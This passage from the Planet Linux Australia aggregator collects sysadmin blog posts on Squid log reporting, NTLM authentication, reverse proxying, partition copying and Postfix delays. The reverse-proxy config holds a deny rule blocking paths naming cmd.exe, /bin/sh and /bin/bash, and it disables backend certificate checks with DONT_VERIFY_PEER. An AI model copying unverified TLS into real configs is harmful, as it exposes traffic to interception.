That fix is #c24a12 – later fixed up a bit by thiagoss to add the ‘sensible’ part to format selection. The initial commit liked to choose a samplerate of 1Hz :)

If you have any further bugs in your GStreamer DVD playback, please let us know!

Planet Linux AustraliaJan Schmidt: Proof of life – A New Adventure!

Hi world! It’s been several years since I used this blog, and there’s been a lot of things happen to us since then. I don’t even live on the same continent as I did.

More on that in a future post. Today, I have an announcement to make – a new Open Source company! Together with fellow GStreamer hackers Tim-Philipp Müller and Sebastian Dröge, I have founded a new company: Centricular Ltd.

From 2007 until July, I was working at Oracle on Sun Ray thin client firmware. Oracle shut down the project in July, and my job along with it – opening up this excellent opportunity to try something I’ve wanted for a while and start a business, while getting back to Free Software full time.

Our website has more information about the Open Source technologies and services we plan to offer. This list is not complete and we will try to broaden it over time, so if you have anything interesting that is not listed there but you think we can help with, get in touch

As Centricular’s first official contribution to the software pool, here’s my Raspberry Pi Camera GStreamer module. It wraps code from Raspivid to allow direct capture from the official camera module and hardware encoding to H.264 in a GStreamer pipeline – without the shell pipe and fdsrc hack people have been using to date. Take a look at the README for more information.

Raspberry Pi Camera GStreamer element

Sebastian, Tim and I will be at the GStreamer Conference in Edinburgh next week.

Planet Linux AustraliaMichael Davies: Planet Linux Australia... rebooted

Recently Linux Australia needed to move its infrastructure to a different place, and so we took the opportunity to build a fresh new instance of the Planet Linux Australia blog aggregator.

It made me realise how crusty the old site had become, how many things I had planned to do which I had left undone, and how I hadn't applied simple concepts such as Infrastructure as Code which have become accepted best-practices in the time since I originally set this up.

Of course things have changed in this time.  People blog less now, so I've also taken the opportunity to remove what appear to be dead blogs from the aggregator.   If you have a blog of interest to the Linux Australia community, you can ask to be added via emailing planet at linux dot org dot au. All you need is a valid Atom or RSS feed.

The other thing that is that the blog aggregator software we use hasn't seen an update since 2011. It started out as PlanetPlanet, then moved on to Venus, and so I've taken a fork to hopefully improve this some more when I find my round tuit. Fortunately I don't still need to run it under python 2.4 which is getting a little long in the tooth.

Finally, the config for Planet Linux Australia is up on github.  Just like the venus code itself, pull requests welcome.  Share and Enjoy :-)

Planet Linux AustraliaMatthew Oliver: I’m now an OpenStack developer.

Hello world,

It’s been a while since I have blogged on this site, I apologise for that. My previous position was a tad proprietary, so although I worked with Linux, what I was doing needs to be sanitised before I can post about it. I have a bunch of posts in the cooker from those days still awaiting sanitation. But I have some great news… I am now an Openstack developer.

It’s been a busy year, married moved over to the UK to work for an amazing company who needs no introduction, Rackspace. Over there I was working with Linux in a Support/DevOps style role, but am back in Oz now with a new team at Rackspace! The Rackspace Cloud Builders. In this role I’ll be getting my development hat on and developing for upstream Openstack again and am so excited about it.

Watch this space!!!

Matt

Planet Linux AustraliaMatthew Oliver: chkconfig-ify an exising init script.

If you are using a 3rd party application / package installer to install a service onto a system that using chkconfig to manage your run-levels, or writing your own which are incompatible with chkconfig. That is to say when trying to add them you get the following error:

# chkconfig <service> on
service <service> does not support chkconfig

Then it needs to be converted to support chkconfig. Don’t worry, it isn’t a rewrite, its just adding some meta-data to the init script.
Just edit the config and add the following lines just below the sha-bang (#!/bin/bash or #!/bin/sh).

# chkconfig: 2345 95 05
# description:
# processname:

NOTE: The numbers on the chkconfig line mean:

That on runlevels 2,3,4 and 5, this subsystem will be activated with priority 95 (one of the lasts), and deactivated with priority 05 (one of the firsts).

The above quote comes from this post where I found this solution, so I am passing it on.

For those playing along at home, chkconfig is the Redhat/Centos/Fedora way of managing your run-levels.

Planet Linux AustraliaMatthew Oliver: Centos 4 / RHEL 4 Bind 9.7.3-8 RPMs.

In case anyone out there in internet land happen to have a BIND DNS server still running RHEL 4 or Centos 4 and require a version that has been back ported from the Centos 6.2 source, one that has the CVE-2012-1667 fix. Then you can download the RPMs I build from here.

NOTE: I’ve only just built them, so haven’t tested them yet, but thought it’ll be better to share. Also they aren’t x86_64, if you need them, let me know and I’ll build some.

Planet Linux AustraliaMatthew Oliver: Simple Squid access log reporting.

Squid is one of the biggest and most used proxies on the interwebs. And generating reports from the access logs is already a done deal, there are many commercial and OSS apps that support the squid log format. But I found my self in a situation where I wanted stats but didn’t want to install a web server on my proxy or use syslog to push my logs to a centralised server which was running such software, and also wasn’t in a position to go buy one of those off the shelf amazing wiz bang Squid reporting and graphing tools.

As a Linux geek I surfed the web to see what others have done. I came across a list provided by the Squid website. Following a couple of links, I came across a awk script called ‘proxy_stats.gawk’ written by Richard Huveneers.

I downloaded it and tried it out… unfortunately it didn’t work, looking at the code.. which he nicely commented showed that he had it set up for access logs  from version 1.* of squid. Now the squid access log format from squid 2.6+ hasn’t changed too much from version 1.1. all they have really done is add a “content type” entry at the end of each line.

So as a good Linux geek does, he upgrades the script, my changes include:

  • Support for squid 2.6+
  • Removed the use a deprecated switches that now isn’t supported in the sort command.
  • Now that there is a an actual content type “column” lets use it to improve the ‘Object type report”.
  • Add a users section, as this was an important report I required which was missing.
  • And in a further hacked version, an auto generated size of the first “name” column.

Now with the explanation out of the way, let me show you it!

For those who are new to awk, this is how I’ve been running it:

zcat <access log file> | awk -f proxy_stats.gawk > <report-filename>

NOTE: I’ve been using it for some historical analysis, so I’m running it on old rotated files, which are compressed thus the zcat.

You can pass more then one file at a time and it order doesn’t matter, as each line of an access log contains the date in epoch time:

zcat `find /var/log/squid/ -name "access.log*"` |awk -f proxy_stats.gawk

The script produces an ascii report (See end of blog entry for example), which could be generated and emailed via cron. If you want it to look nice in any email client using html the I suggest wrapping it in <pre> tags.:

<html>
<head><title>Report Title</title></head>
Report title<body>
<pre>
... Report goes here ...
</pre>
</body>
</html>

For those experienced Linux sys admins out there using cron + ‘find -mtime’ would be a very simple way of having an automated daily, weekly or even monthly report.
But like I said earlier I was working on historic data, hundreds of files in a single report, hundreds because for business reasons we have been rotating the squid logs every hour… so I did what I do best, write a quick bash script to find all the files I needed to cat into the report:

#!/bin/bash

ACCESS_LOG_DIR="/var/log/squid/access.log*"
MONTH="$1"

function getFirstLine() {
	if [ -n  "`echo $1 |grep "gz$"`" ]
	then
		zcat $1 |head -n 1
	else
		head -n 1 $1 
	fi
}

function getLastLine() {
	if [ -n  "`echo $1 |grep "gz$"`" ]
	then
		zcat $1 |tail -n 1
	else
		tail -n 1 $1 
	fi
}

for log in `ls $ACCESS_LOG_DIR`
do
	firstLine="`getFirstLine $log`"
	epochStr="`echo $firstLine |awk '{print $1}'`"
	month=`date -d @$epochStr +%m`
	
	if [ "$month" -eq "$MONTH" ]
	then
		echo $log
		continue
	fi

	
	#Check the last line
	lastLine="`getLastLine $log`"
	epochStr="`echo $lastLine |awk '{print $1}'`"
        month=`date -d @$epochStr +%m`

        if [ "$month" -eq "$MONTH" ]
        then
                echo $log
        fi
	
done

So there you go, thanks to the work of Richard Huveneers there is a script that I think generates a pretty good acsii report, which can be automated or integrated easily into any Linux/Unix work flow.

If you interested in getting hold of the most up to date version of the script you can get it from my sysadmin github repo here.

As promised earlier here is an example report:

Parsed lines  : 32960
Bad lines     : 0

First request : Mon 30 Jan 2012 12:06:43 EST
Last request  : Thu 09 Feb 2012 09:05:01 EST
Number of days: 9.9

Top 10 sites by xfers           reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
213.174.155.216                   20   0.1% 100.0%   0.0%        0.0   0.0%   0.0%       1.7       2.5
30.media.tumblr.com                1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%      48.3      77.4
28.media.tumblr.com                1   0.0% 100.0%   0.0%        0.1   0.0%   0.0%      87.1       1.4
26.media.tumblr.com                1   0.0%   0.0%      -        0.0   0.0%      -         -         -
25.media.tumblr.com                2   0.0% 100.0%   0.0%        0.1   0.0%   0.0%      49.2      47.0
24.media.tumblr.com                1   0.0% 100.0%   0.0%        0.1   0.0%   0.0%     106.4     181.0
10.1.10.217                      198   0.6% 100.0%   0.0%       16.9   0.9%   0.0%      87.2    3332.8
3.s3.envato.com                   11   0.0% 100.0%   0.0%        0.1   0.0%   0.0%       7.6      18.3
2.s3.envato.com                   15   0.0% 100.0%   0.0%        0.1   0.0%   0.0%       7.5      27.1
2.media.dorkly.cvcdn.com           8   0.0% 100.0%  25.0%        3.2   0.2%   0.3%     414.1     120.5

Top 10 sites by MB              reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
zulu.tweetmeme.com                 2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       3.1     289.6
ubuntu.unix.com                    8   0.0% 100.0% 100.0%        0.1   0.0% 100.0%       7.5     320.0
static02.linkedin.com              1   0.0% 100.0% 100.0%        0.0   0.0% 100.0%      36.0     901.0
solaris.unix.com                   2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       3.8     223.6
platform.tumblr.com                2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       1.1     441.4
i.techrepublic.com.com             5   0.0%  60.0% 100.0%        0.0   0.0% 100.0%       6.8    2539.3
i4.zdnetstatic.com                 2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%      15.3     886.4
i4.spstatic.com                    1   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       4.7     520.2
i2.zdnetstatic.com                 2   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       7.8    2920.9
i2.trstatic.com                    9   0.0% 100.0% 100.0%        0.0   0.0% 100.0%       1.5     794.5

Top 10 neighbor report          reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
www.viddler.com                    4   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.turktrust.com.tr              16   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.trendmicro.com                 5   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.reddit.com                     2   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.linkedin.com                   2   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.google-analytics.com           2   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.facebook.com                   2   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.dynamicdrive.com               1   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
www.benq.com.au                    1   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
wd-edge.sharethis.com              1   0.0% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0

Local code                      reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
TCP_CLIENT_REFRESH_MISS         2160   6.6% 100.0%   0.0%        7.2   0.4%   0.0%       3.4      12.9
TCP_HIT                          256   0.8% 100.0%  83.2%       14.0   0.8% 100.0%      56.0    1289.3
TCP_IMS_HIT                      467   1.4% 100.0% 100.0%       16.9   0.9% 100.0%      37.2    1747.4
TCP_MEM_HIT                      426   1.3% 100.0% 100.0%       96.5   5.3% 100.0%     232.0    3680.9
TCP_MISS                       27745  84.2%  97.4%   0.0%     1561.7  85.7%   0.3%      59.2      18.2
TCP_REFRESH_FAIL                  16   0.0% 100.0%   0.0%        0.2   0.0%   0.0%      10.7       0.1
TCP_REFRESH_MODIFIED             477   1.4%  99.8%   0.0%       35.0   1.9%   0.0%      75.3    1399.4
TCP_REFRESH_UNMODIFIED          1413   4.3% 100.0%   0.0%       91.0   5.0%   0.0%      66.0     183.5

Status code                     reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
000                              620   1.9% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
200                            29409  89.2% 100.0%   2.9%     1709.7  93.8%   7.7%      59.5     137.1
204                              407   1.2% 100.0%   0.0%        0.2   0.0%   0.0%       0.4       1.4
206                              489   1.5% 100.0%   0.0%      112.1   6.1%   0.0%     234.7     193.0
301                               82   0.2% 100.0%   0.0%        0.1   0.0%   0.0%       0.7       1.5
302                              356   1.1% 100.0%   0.0%        0.3   0.0%   0.0%       0.8       2.7
303                                5   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       0.7       1.5
304                              862   2.6% 100.0%  31.2%        0.4   0.0%  30.9%       0.4      34.2
400                                1   0.0%   0.0%      -        0.0   0.0%      -         -         -
401                                1   0.0%   0.0%      -        0.0   0.0%      -         -         -
403                               47   0.1%   0.0%      -        0.0   0.0%      -         -         -
404                              273   0.8%   0.0%      -        0.0   0.0%      -         -         -
500                                2   0.0%   0.0%      -        0.0   0.0%      -         -         -
502                               12   0.0%   0.0%      -        0.0   0.0%      -         -         -
503                               50   0.2%   0.0%      -        0.0   0.0%      -         -         -
504                              344   1.0%   0.0%      -        0.0   0.0%      -         -         -

Hierarchie code                 reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
DIRECT                         31843  96.6%  97.7%   0.0%     1691.0  92.8%   0.0%      55.7      44.3
NONE                            1117   3.4% 100.0% 100.0%      131.6   7.2% 100.0%     120.7    2488.2

Method report                   reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
CONNECT                         5485  16.6%  99.2%   0.0%      132.8   7.3%   0.0%      25.0       0.3
GET                            23190  70.4%  97.7%   4.9%     1686.3  92.5%   7.8%      76.2     183.2
HEAD                            2130   6.5%  93.7%   0.0%        0.7   0.0%   0.0%       0.3       1.1
POST                            2155   6.5%  99.4%   0.0%        2.9   0.2%   0.0%       1.4       2.0

Object type report              reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
*/*                                1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       1.6       3.2
application/cache-digest         396   1.2% 100.0%  50.0%       33.7   1.8%  50.0%      87.1    3655.1
application/gzip                   1   0.0% 100.0%   0.0%        0.1   0.0%   0.0%      61.0      30.8
application/javascript           227   0.7% 100.0%  12.3%        2.2   0.1%   7.7%       9.9      91.9
application/json                 409   1.2% 100.0%   0.0%        1.6   0.1%   0.0%       4.1       6.0
application/ocsp-response        105   0.3% 100.0%   0.0%        0.2   0.0%   0.0%       1.9       2.0
application/octet-stream         353   1.1% 100.0%   6.8%       81.4   4.5%   9.3%     236.1     406.9
application/pdf                    5   0.0% 100.0%   0.0%       13.5   0.7%   0.0%    2763.3      75.9
application/pkix-crl              96   0.3% 100.0%  13.5%        1.0   0.1%   1.7%      10.6       7.0
application/vnd.google.sa       1146   3.5% 100.0%   0.0%        1.3   0.1%   0.0%       1.1       2.4
application/vnd.google.sa       4733  14.4% 100.0%   0.0%       18.8   1.0%   0.0%       4.1      13.4
application/x-bzip2               19   0.1% 100.0%   0.0%       78.5   4.3%   0.0%    4232.9     225.5
application/x-gzip               316   1.0% 100.0%  59.8%      133.4   7.3%  59.3%     432.4    3398.1
application/x-javascript        1036   3.1% 100.0%   5.8%        9.8   0.5%   3.4%       9.7      52.1
application/xml                   46   0.1% 100.0%  34.8%        0.2   0.0%  35.1%       3.5     219.7
application/x-msdos-progr        187   0.6% 100.0%   0.0%       24.4   1.3%   0.0%     133.7     149.6
application/x-pkcs7-crl           83   0.3% 100.0%   7.2%        1.6   0.1%   0.4%      19.8      10.8
application/x-redhat-pack         13   0.0% 100.0%   0.0%       57.6   3.2%   0.0%    4540.7     156.7
application/x-rpm                507   1.5% 100.0%   6.3%      545.7  29.9%   1.5%    1102.2     842.8
application/x-sdlc                 1   0.0% 100.0%   0.0%        0.9   0.0%   0.0%     888.3     135.9
application/x-shockwave-f        109   0.3% 100.0%  11.9%        5.4   0.3%  44.5%      50.6     524.1
application/x-tar                  9   0.0% 100.0%   0.0%        1.5   0.1%   0.0%     165.3      36.4
application/x-www-form-ur         11   0.0% 100.0%   0.0%        0.1   0.0%   0.0%       9.9      15.4
application/x-xpinstall            2   0.0% 100.0%   0.0%        2.5   0.1%   0.0%    1300.6     174.7
application/zip                 1802   5.5% 100.0%   0.0%      104.0   5.7%   0.0%      59.1       2.5
Archive                           89   0.3% 100.0%   0.0%        0.0   0.0%      -       0.0       0.0
audio/mpeg                         2   0.0% 100.0%   0.0%        5.8   0.3%   0.0%    2958.2      49.3
binary/octet-stream                2   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       5.5      14.7
font/ttf                           2   0.0% 100.0%   0.0%        0.0   0.0%   0.0%      15.5      12.5
font/woff                          1   0.0% 100.0% 100.0%        0.0   0.0% 100.0%      42.5    3539.6
Graphics                         126   0.4% 100.0%   0.0%        0.1   0.0%   0.0%       0.6       2.5
HTML                              14   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       0.1       0.1
image/bmp                          1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       1.3       3.9
image/gif                       5095  15.5% 100.0%   2.4%       35.9   2.0%   0.7%       7.2       9.5
image/jpeg                      1984   6.0% 100.0%   4.3%       52.4   2.9%   0.6%      27.0      62.9
image/png                       1684   5.1% 100.0%  10.3%       28.6   1.6%   1.9%      17.4     122.2
image/vnd.microsoft.icon          10   0.0% 100.0%  30.0%        0.0   0.0%  12.8%       1.0       3.3
image/x-icon                      72   0.2% 100.0%  16.7%        0.2   0.0%   6.0%       3.2      15.0
multipart/bag                      6   0.0% 100.0%   0.0%        0.1   0.0%   0.0%      25.2      32.9
multipart/byteranges              93   0.3% 100.0%   0.0%       16.5   0.9%   0.0%     182.0     178.4
text/cache-manifest                1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       0.7       3.1
text/css                         470   1.4% 100.0%   7.9%        3.4   0.2%   5.8%       7.4      59.7
text/html                       2308   7.0%  70.7%   0.4%        9.6   0.5%   0.6%       6.0      14.7
text/javascript                 1243   3.8% 100.0%   2.7%       11.1   0.6%   5.2%       9.1      43.3
text/json                          1   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       0.5       0.7
text/plain                      1445   4.4%  99.4%   1.5%       68.8   3.8%   5.5%      49.0      41.9
text/x-cross-domain-polic         24   0.1% 100.0%   0.0%        0.0   0.0%   0.0%       0.7       1.7
text/x-js                          2   0.0% 100.0%   0.0%        0.0   0.0%   0.0%      10.1       6.4
text/x-json                        9   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       3.0       8.5
text/xml                         309   0.9% 100.0%  12.9%       12.9   0.7%  87.5%      42.8     672.3
unknown/unknown                 6230  18.9%  99.3%   0.0%      132.9   7.3%   0.0%      22.0       0.4
video/mp4                          5   0.0% 100.0%   0.0%        3.2   0.2%   0.0%     660.8      62.7
video/x-flv                      117   0.4% 100.0%   0.0%      321.6  17.6%   0.0%    2814.9     308.3
video/x-ms-asf                     2   0.0% 100.0%   0.0%        0.0   0.0%   0.0%       1.1       4.7

Ident (User) Report             reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
-                              32960 100.0%  97.8%   3.5%     1822.6 100.0%   7.2%      57.9     129.0

Weekly report                   reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
2012/01/26                     14963  45.4%  97.6%   3.6%      959.8  52.7%   1.8%      67.3     104.5
2012/02/02                     17997  54.6%  98.0%   3.4%      862.8  47.3%  13.2%      50.1     149.4

Total report                    reqs   %all %xfers   %hit         MB   %all   %hit     kB/xf      kB/s
------------------------- ------------------------------- ------------------------ -------------------
All requests                   32960 100.0%  97.8%   3.5%     1822.6 100.0%   7.2%      57.9     129.0

Produced by : Mollie's hacked access-flow 0.5
Running time: 2 seconds

Happy squid reporting!

Planet Linux AustraliaMatthew Oliver: Identically partition disks.. the easy way!

Was just looking into a software RAID howto.. for no reason really, but kinda glad I did! When you set up software raid you want to make sure all disks are partitioned the same, right. so check this out:

3. Create partitions on /dev/sda identical to the partitions on /dev/sdb:

sfdisk -d /dev/sdb | sfdisk /dev/sda

That’s a much easier way ;)

This gem is thanks to: http://www.howtoforge.com/how-to-create-a-raid1-setup-on-an-existing-centos-redhat-6.0-system

Planet Linux AustraliaMatthew Oliver: NTLM Authentication in Squid using Winbind.

Some old windows servers require authentication through the old NTLM protocol, luckily with the help from squid, samba and winbind we can do this under Linux.

Some URLs a much of this information was gathered from are:

  • http://wiki.squid-cache.org/ConfigExamples/Authenticate/NtlmCentOS5
  • http://wiki.squid-cache.org/ConfigExamples/Authenticate/Ntlm

HOW TO

In order to authenticate through winbind we will be using that and samba to connect to a windows domain, so you will need to have a domain and the details for it or all this will be for naught. I’ll use some fake credentials for this post.

Required Packages
Let’s install all the required packages:

yum install squid krb5-workstation samba-common ntp samba-winbind authconfig

NTP (Network Time Protocol)
Kerberos and windbind can be a little thingy about date and time, so its a good idea to use NTP for your network, I’ll assume your domain controller (DC) will be also your NTP server in which case lets set it up.

Comment out any lines that begin with server and create only one that points to your Active Directory PDC.

# vim /etc/ntp.conf
server pdc.test.lan

Now add it to the default runlevels and start it.

chkconfig ntpd on
/etc/init.d/ntpd start

Samba, Winbind and Kerberos
We will the use the authconfig package/command we installed earlier to configure Samba, Winbind and perform the join in one step, this makes things _SO_ much
easier!!!

NOTE: If you don’t have DNS set up then you will need to add the DC to your hosts file, and it is important to use the name the DC machine knows itself as in AD.


authconfig --enableshadow --enablemd5 --passalgo=md5 --krb5kdc=pdc.test.lan \
--krb5realm=TEST.LAN --smbservers=pdc.test.lan --smbworkgroup=TESTLAN \
--enablewinbind --enablewinbindauth --smbsecurity=ads --smbrealm=TEST.LAN \
--smbidmapuid="16777216-33554431" --smbidmapgid="16777216-33554431" --winbindseparator="+" \
--winbindtemplateshell="/bin/false" --enablewinbindusedefaultdomain --disablewinbindoffline \
--winbindjoin=administrator --disablewins --disablecache --enablelocauthorize --updateall

NOTE: Replace pdc.test.lan with that of your FQDN of your DC server, TESTLAN with your domain, TEST.LAN with the full name of the domain/realm, and make sure you set ‘–winbindjoin’ with a domain admin.

If that succeeds lets test it:

# wbinfo -u
# wbinfo -g

If you are able to enumerate your Active Directory Groups and Users, everything is working.

Next lets test that we can authenticate with winbind:

# wbinfo -a

E.G:

# wbinfo -a testuser
Enter testuser's password:
plaintext password authentication succeeded
Enter testuser's password:
challenge/response password authentication succeeded

Great, we have been added to the domain, so now we can setup squid for NTLM authentication.

SQUID Configuration
Squid comes with its own ntlm authentication binary (/usr/lib64/squid/ntlm_smb_lm_auth) which uses winbind, but as of Samba 3.x, samba bundle their own which is the recommended binary to use (according to the squid and samba projects). So the binary we use comes from the samba-winbind package we installed earlier:

/usr/bin/ntlm_auth

Add the following configuration elements to the squid.conf to enable NTLM authentication:

#NTLM
auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp
auth_param ntlm children 5
auth_param ntlm keep_alive on

acl ntlm proxy_auth REQUIRED
http_access allow ntlm

NOTE: The above is allowing anyone access as long as they authenticate themselves via NTLM, you could use further acl’s to restrict this more.

The ntlm_auth binary has other switches that might be of use, such as restricting users by group membership:

auth_param ntlm program /usr/bin/ntlm_auth --helper-protocol=squid-2.5-ntlmssp --require-membership-of=EXAMPLE+ADGROUP

Before we are complete there is one more thing we need to do, for squid to be allowed to use winbind, the squid user (which was created when the squid package was installed) needs to be a member of a wbpriv group:

gpasswd -a squid wbpriv

IMPORTANT!
NTLM authentication WILL FAIL if you have “cache_effective_group squid” set, if you do then remove it! As this overrides the effective group and squid then isn’t seen as part of the ‘wbpriv’ group which breaks authentication!!!
/IMPORTANT!

Add squid to the runlevels and start it:

# chkconfig squid on
# /etc/init.d/squid start

Trouble shooting
Make sure you open the port in iptables, if squid is listening on 3128 then:

# iptables -I INPUT 1 -p tcp --dport 3128 -j ACCEPT
# /etc/init.d/iptables save

NOTE: The ‘/etc/init.d/iptables save’ command saves the current running configuration so the new rule will be applied on reboot.

Happy squid-ing.

Planet Linux AustraliaMatthew Oliver: Reverse proxy using squid + Redirection

Squid – Reverse Proxy

In computer networks, a reverse proxy is a type of proxy server that retrieves resources on behalf of a client from one or more servers. These resources are then returned to the client as though it originated from the reverse proxy itself. While a forward proxy is usually situated between the client application (such as a web browser) and the server(s) hosting the desired resources, a reverse proxy is usually situated closer to the server(s) and will only return a configured set of resources.

See: http://en.wikipedia.org/wiki/Reverse_proxy

Configuration

Squid should already be installed, if not then install it:

yum install squid

Then we edit squid config:


vim /etc/squid/squid.conf

Add we add the following to the top of the file:

http_port 80 vhost
https_port 443 cert=/etc/squid/localhost.crt key=/etc/squid/localhost.key vhost

cache_effective_user squid
cache_effective_group squid

cache_peer 1.2.3.4 parent 80 0 no-query originserver login=PASS name=site1-http
cache_peer 1.2.3.5 parent 443 0 no-query originserver login=PASS ssl sslflags=DONT_VERIFY_PEER name=site2-ssl
cache_peer_domain site1-http site1.example.lan
cache_peer_domain site2-ssl site2.anotherexample.lan

acl bad_requests urlpath_regex -i cmd.exe \/bin\/sh \/bin\/bash default\.ida?XXX insert update delete select
http_access deny bad_requests

Now I’ll walk us through the above configuration.

http_port 80 vhost
https_port 443 cert=/etc/squid/localhost.crt key=/etc/squid/localhost.key vhost

This sets the http and https ports squid is listening on. Note the cert options for https, we can get squid to use https up to the proxy and unencrytped link to the last hop if we want.. which is cool. If for some reason the server doesn’t support https.


cache_effective_user squid
cache_effective_group squid

Set the effective user and group for squid.. this may not be required, but doesn’t hurt.


cache_peer 1.2.3.4 parent 80 0 no-query originserver name=site1-http
cache_peer 1.2.3.5 parent 443 0 no-query originserver ssl sslflags=DONT_VERIFY_PEER name=site2-ssl
cache_peer_domain site1-http site1.example.lan
cache_peer_domain site2-ssl site2.anotherexample.lan

This is the magic, the first two lines, tell squid which peer to reverse proxy for and what port to use. Note if you use ssl the ‘sslflags=DONT_VERIFY_PEER’ is useful otherwise if your using a self signed cert you’ll have certificate errors.

IMPORTANT: If you want to allow http authentication (auth handled by the web server, such as htaccess) then you need to add ‘login=PASS’ otherwise squid will try and authenticate to squid rather than the http server.

The last two lines, reference the first two and tell squid the domains to listen to, so if someone connects to squid looking for that domain it knows where to go/cache.


acl bad_requests urlpath_regex -i cmd.exe \/bin\/sh \/bin\/bash default\.ida?XXX insert update delete select
http_access deny bad_requests

NOTE: The acl line has been cut over two lines, this should be on one. There should be the ACL line and the http_access line.
These lines set up some bad requests to which we deny access to, this is to help prevent SQL injection, and other hack attempts, etc.

That’s it, after a (re)start to squid you it will be reverse proxying the domains.

Redirect to SSL

We had a requirement to automatically redirect to https if someone came in on http. Squid allows redirecting through a variety of ways, you can write a redirect script at get squid to use it, but there is a simpler way, using all squid internals and acls.

Add the following to the entries added in the last section:


acl port80 myport 80
acl site1 dstdomain site1.example.lan
http_access deny port80 site1
deny_info https://site1.example.lan/ site1

acl site2 dstdomain site2.anotherexample.lan
http_access deny port80 site2
deny_info https://site2.anotherexample.lan/ site2

We create an acl for the squids port 80 and then one for the domain we want to redirect. We then use “http_access deny” to cause squid to deny access to that domain coming in on port 80 (http). This causes a deny which is caught by the deny_info which redirects it to https.

The order used of the acl’s in the http_access and the deny_info is important. Squid only remembers the last acl used by a http_access command and will look for a corresponding deny_info matched to that acl. So make sure the last acl matches the acl used in the deny_info statement!

NOTE: See http://www.squid-cache.org/Doc/config/deny_info/

Appendix

The following is the configuration all put together now.

Reverse proxy + redirection:

http_port 80 vhost
https_port 443 cert=/etc/squid/localhost.crt key=/etc/squid/localhost.key vhost

cache_effective_user squid
cache_effective_group squid

cache_peer 1.2.3.4 parent 80 0 no-query originserver login=PASS name=site1-http
cache_peer 1.2.3.5 parent 443 0 no-query originserver login=PASS ssl sslflags=DONT_VERIFY_PEER name=site2-ssl
cache_peer_domain site1-http site1.example.lan
cache_peer_domain site2-ssl site2.anotherexample.lan

acl bad_requests urlpath_regex -i cmd.exe \/bin\/sh \/bin\/bash default\.ida?XXX insert update delete select
http_access deny bad_requests

acl port80 myport 80
acl site1 dstdomain site1.example.lan
http_access deny port80 site1
deny_info https://site1.example.lan/ site1

acl site2 dstdomain site2.anotherexample.lan
http_access deny port80 site2
deny_info https://site2.anotherexample.lan/ site2

Planet Linux AustraliaMatthew Oliver: Posfix – Making sense of delays in mail

The maillog

The maillog is easy enough to follow, but when you understand what all the delay and delays numbers mean then this may help really understand what is going on!
A standard email entry in postfix looks like:

Jan 10 10:00:00 testmtr postfix/smtp[20123]: 34A1B160852B: to=, relay=mx1.example.lan[1.2.3.4]:25, delay=0.49, delays=0.2/0/0.04/0.25, dsn=2.0.0, status=sent

Pretty straight forward: date, email identifier in the mailq (34A1B160852B), recipient, which server the email is being sent to (relay). It is the delay and delays I’d like to talk about.

Delay and Delays
If we take a look at the example email from above:

Jan 10 10:00:00 testmtr postfix/smtp[20123]: 34A1B160852B: to=, relay=mx1.example.lan[1.2.3.4]:25, delay=0.49, delays=0.2/0/0.04/0.25, dsn=2.0.0, status=sent

The delay parameter (delay=0.49) is fairly self explanatory, it is the total amount of time this email (34A1B160852B) has been on this server. But what is the delays parameter all about?

delays=0.2/0/0.04/0.25

NOTE: Numbers smaller than 0.01 seconds are truncated to 0, to reduce the noise level in the logfile.

You might have guessed it is a break down of the total delay, but what do each number represent?

Well from the release notes we get:

delays=a/b/c/d:
a=time before queue manager, including message transmission;
b=time in queue manager;
c=connection setup time including DNS, HELO and TLS;
d=message transmission time.

There for looking at our example:

  • a (0.2): The time before getting to the queue manager, so the time it took to be transmitted onto the mail server and into postfix.
  • b (0): The time in queue manager, so this email didn’t hit the queues, so it was emailed straight away.
  • c (0.04): The time it took to set up a connection with the destination mail relay.
  • d (0.25): The time it took to transmit the email to the destination mail relay.

However if the email is deferred, then when the email is attempted to be sent again:

